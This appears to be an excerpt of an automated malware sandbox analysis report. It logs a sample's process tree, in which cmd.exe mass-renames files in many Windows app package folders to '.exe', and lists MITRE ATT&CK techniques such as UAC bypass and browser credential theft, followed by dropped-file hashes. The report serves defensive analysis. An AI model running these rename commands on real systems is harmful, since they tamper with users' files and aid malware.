      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\AppData\*.*" "*.exe"
        6⤵
        
        PID:2368
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\LocalCache\*.*" "*.exe"
        6⤵
        
        PID:4740
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\LocalState\*.*" "*.exe"
        6⤵
        
        PID:3708
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\RoamingState\*.*" "*.exe"
        6⤵
        
        PID:1628
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\Settings\*.*" "*.exe"
        6⤵
        
        PID:708
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\SystemAppData\*.*" "*.exe"
        6⤵
        
        PID:5088
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\TempState\*.*" "*.exe"
        6⤵
        
        PID:2180
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\AC\INetCache\*.*" "*.exe"
        6⤵
        
        PID:3328
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\AC\INetCookies\*.*" "*.exe"
        6⤵
        
        PID:2228
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\AC\INetHistory\*.*" "*.exe"
        6⤵
        
        PID:772
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\F46D4000-FD22-4DB4-AC8E-4E1DDDE828FE_cw5n1h2txyewy\AC\Temp\*.*" "*.exe"
        6⤵
        
        PID:4716
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\AC\*.*" "*.exe"
        6⤵
        
        PID:1444
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\AppData\*.*" "*.exe"
        6⤵
        
        PID:4964
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\LocalCache\*.*" "*.exe"
        6⤵
        
        PID:5020
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\LocalState\*.*" "*.exe"
        6⤵
        
        PID:4952
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\RoamingState\*.*" "*.exe"
        6⤵
        
        PID:3516
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\Settings\*.*" "*.exe"
        6⤵
        
        PID:2292
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\SystemAppData\*.*" "*.exe"
        6⤵
        
        PID:4368
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\TempState\*.*" "*.exe"
        6⤵
        
        PID:2608
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\AC\INetCache\*.*" "*.exe"
        6⤵
        
        PID:4572
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\AC\INetCookies\*.*" "*.exe"
        6⤵
        
        PID:3092
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\AC\INetHistory\*.*" "*.exe"
        6⤵
        
        PID:3292
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy\AC\Temp\*.*" "*.exe"
        6⤵
        
        PID:3220
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\AC\*.*" "*.exe"
        6⤵
        
        PID:2808
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\AppData\*.*" "*.exe"
        6⤵
        
        PID:2732
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\LocalCache\*.*" "*.exe"
        6⤵
        
        PID:1820
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\LocalState\*.*" "*.exe"
        6⤵
        
        PID:344
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:552
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\RoamingState\*.*" "*.exe"
        6⤵
        
        PID:1428
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\Settings\*.*" "*.exe"
        6⤵
        
        PID:3856
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\SystemAppData\*.*" "*.exe"
        6⤵
        
        PID:3712
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\TempState\*.*" "*.exe"
        6⤵
        
        PID:4872
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\AC\INetCache\*.*" "*.exe"
        6⤵
        
        PID:2128
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\AC\INetCookies\*.*" "*.exe"
        6⤵
        
        PID:4796
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\AC\INetHistory\*.*" "*.exe"
        6⤵
        
        PID:1660
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\AC\Temp\*.*" "*.exe"
        6⤵
        
        PID:2864
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\AC\*.*" "*.exe"
        6⤵
        
        PID:3828
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\AppData\*.*" "*.exe"
        6⤵
        
        PID:4556
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\LocalCache\*.*" "*.exe"
        6⤵
        
        PID:4752
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\LocalState\*.*" "*.exe"
        6⤵
        
        PID:2096
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\RoamingState\*.*" "*.exe"
        6⤵
        
        PID:2880
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\Settings\*.*" "*.exe"
        6⤵
        
        PID:4032
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\SystemAppData\*.*" "*.exe"
        6⤵
        
        PID:2680
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\TempState\*.*" "*.exe"
        6⤵
        
        PID:708
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\AC\INetCache\*.*" "*.exe"
        6⤵
        
        PID:1544
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\AC\INetCookies\*.*" "*.exe"
        6⤵
        
        PID:4632
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\AC\INetHistory\*.*" "*.exe"
        6⤵
        
        PID:3564
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\AC\Temp\*.*" "*.exe"
        6⤵
        
        PID:3408
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\AC\*.*" "*.exe"
        6⤵
        
        PID:1076
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\AppData\*.*" "*.exe"
        6⤵
        
        PID:1784
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\LocalCache\*.*" "*.exe"
        6⤵
        
        PID:3996
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\LocalState\*.*" "*.exe"
        6⤵
        
        PID:2604
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\RoamingState\*.*" "*.exe"
        6⤵
        
        PID:1148
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\Settings\*.*" "*.exe"
        6⤵
        
        PID:2104
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\SystemAppData\*.*" "*.exe"
        6⤵
        
        PID:4840
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:900
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\TempState\*.*" "*.exe"
        6⤵
        
        PID:2332
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\AC\INetCache\*.*" "*.exe"
        6⤵
        
        PID:4980
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\AC\INetCookies\*.*" "*.exe"
        6⤵
        
        PID:384
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\AC\INetHistory\*.*" "*.exe"
        6⤵
        
        PID:2596
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\AC\Temp\*.*" "*.exe"
        6⤵
        
        PID:3364
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\AC\*.*" "*.exe"
        6⤵
        
        PID:4668
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\AppData\*.*" "*.exe"
        6⤵
        
        PID:3344
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\LocalCache\*.*" "*.exe"
        6⤵
        
        PID:1448
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\LocalState\*.*" "*.exe"
        6⤵
        
        PID:3852
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\RoamingState\*.*" "*.exe"
        6⤵
        
        PID:2116
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\Settings\*.*" "*.exe"
        6⤵
        
        PID:2888
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\SystemAppData\*.*" "*.exe"
        6⤵
        
        PID:1244
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\TempState\*.*" "*.exe"
        6⤵
        
        PID:4548
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\AC\INetCache\*.*" "*.exe"
        6⤵
        
        PID:1724
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\AC\INetCookies\*.*" "*.exe"
        6⤵
        
        PID:692
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\AC\INetHistory\*.*" "*.exe"
        6⤵
        
        PID:4540
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.CredDialogHost_cw5n1h2txyewy\AC\Temp\*.*" "*.exe"
        6⤵
        
        PID:4556
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:2560
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\*.*" "*.exe"
        6⤵
        
        PID:1792
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AppData\*.*" "*.exe"
        6⤵
        
        PID:4836
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\LocalCache\*.*" "*.exe"
        6⤵
        
        PID:896
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\LocalState\*.*" "*.exe"
        6⤵
        
        PID:3708
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\RoamingState\*.*" "*.exe"
        6⤵
        
        PID:1160
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\Settings\*.*" "*.exe"
        6⤵
        
        PID:2084
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\SystemAppData\*.*" "*.exe"
        6⤵
        
        PID:4604
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\TempState\*.*" "*.exe"
        6⤵
        
        PID:1072
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:3980
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\*.*" "*.exe"
        6⤵
        
        PID:984
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCookies\*.*" "*.exe"
        6⤵
        
        PID:3716
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetHistory\*.*" "*.exe"
        6⤵
        
        PID:3272
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\Temp\*.*" "*.exe"
        6⤵
        
        PID:4788
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\AC\*.*" "*.exe"
        6⤵
        
        PID:240
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\AppData\*.*" "*.exe"
        6⤵
        
        PID:4936
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:2804
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\LocalCache\*.*" "*.exe"
        6⤵
        
        PID:1920
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\LocalState\*.*" "*.exe"
        6⤵
        
        PID:416
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\RoamingState\*.*" "*.exe"
        6⤵
        
        PID:3192
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\Settings\*.*" "*.exe"
        6⤵
        
        PID:2304
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\SystemAppData\*.*" "*.exe"
        6⤵
        
        PID:2732
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\TempState\*.*" "*.exe"
        6⤵
        
        PID:4980
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\AC\INetCache\*.*" "*.exe"
        6⤵
        
        PID:3148
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\AC\INetCookies\*.*" "*.exe"
        6⤵
        
        PID:1428
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\AC\INetHistory\*.*" "*.exe"
        6⤵
        
        PID:3892

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3584

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2808

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s upnphost
1⤵
- Drops file in Windows directory
PID:4712

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
PID:780
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4836 -ip 4836
  2⤵
  PID:2604

C:\Users\Admin\Desktop\UpdateResize.exe
"C:\Users\Admin\Desktop\UpdateResize.exe"
1⤵
PID:3152

C:\Users\Admin\Desktop\OutMerge.exe
"C:\Users\Admin\Desktop\OutMerge.exe"
1⤵
PID:224

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ImportReceive.exe.log

Filesize
1KB

MD5
ac45cc773216001c355992d869450b47

SHA1
1f19c3839b521e1bf1ec7928f32f45234f38ea40

SHA256
c9c03abe98c496376975747c9b617f5f6e1b50aec09aa8be31aa24e81254901f

SHA512
3d73620a59089bc05d60ae07f0811ddacd1661599eca096cd9927813f86dc9cebac1de221691373601c743250694de43e408a9e607e813fb28260b1509f84574

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\4d93d68a-6cba-48ba-8aa1-6900da8cfddf.tmp

Filesize
11KB

MD5
e6c84192dfdd2254fcb511952fec7d0a

SHA1
7c64e01cfd4c6f7fa7769adf5a034bf9a5d66c09

SHA256
36ec3fe336847ceb12d90832b4816733a80d8858eac279ff736adcdb9d85333e

SHA512
72fcb03b5ce70a7c40b53cd0925302c26af5f0700463fca9d0ac70d3a03bc9f36a88e7c06e3499b473cfff257e1fab773fac5d654942b3126e45e9067179deb4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
003b92b33b2eb97e6c1a0929121829b8

SHA1
6f18e96c7a2e07fb5a80acb3c9916748fd48827a

SHA256
8001f251d5932a62bfe17b0ba3686ce255ecf9adb95a06ecb954faa096be3e54

SHA512
18005c6c07475e6dd1ec310fe511353381cf0f15d086cf20dc6ed8825c872944185c767f80306e56fec9380804933aa37a8f12c720398b4b3b42cb216b41cf77

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
051a939f60dced99602add88b5b71f58

SHA1
a71acd61be911ff6ff7e5a9e5965597c8c7c0765

SHA256
2cff121889a0a77f49cdc4564bdd1320cf588c9dcd36012dbc3669cf73015d10

SHA512
a9c72ed43b895089a9e036aba6da96213fedd2f05f0a69ae8d1fa07851ac8263e58af86c7103ce4b4f9cfe92f9c9d0a46085c066a54ce825ef53505fdb988d1f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000017

Filesize
3.0MB

MD5
149cc2ec1900cb778afb50d8026eadf5

SHA1
a7bc1bbc7bdc970757ec369ef0b51dc53989f131

SHA256
817a695e53a1d6e24f2c701751b4d18468f20698f30fada420dfba6e21a09797

SHA512
d617654478beb6325d86c108cddaff8f8d658a235d26b8e0282ed85dca826bdb62b0b67e749c7cd421dbae1d98084220e2f4d5779badb8fd7ab07ff333a35553

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
8356442d71a21c62c6ef012fbd7253a6

SHA1
ba0ad4d9fb034fca1aeaa01550fdcc47ca7ff3bf

SHA256
6fcab7327804d7ec04efe82624dd24d009c1464e8918c4716e677669b4c81d1b

SHA512
3d0c20bcfe4ee4aaedd16d6f432c30c801b5f35c4f355f7c1c84509536e94e9ee45d301e4f80aeb398ecdd1d76c6a84cb5b8e93001a8fe22d299328018974581

Download Submit
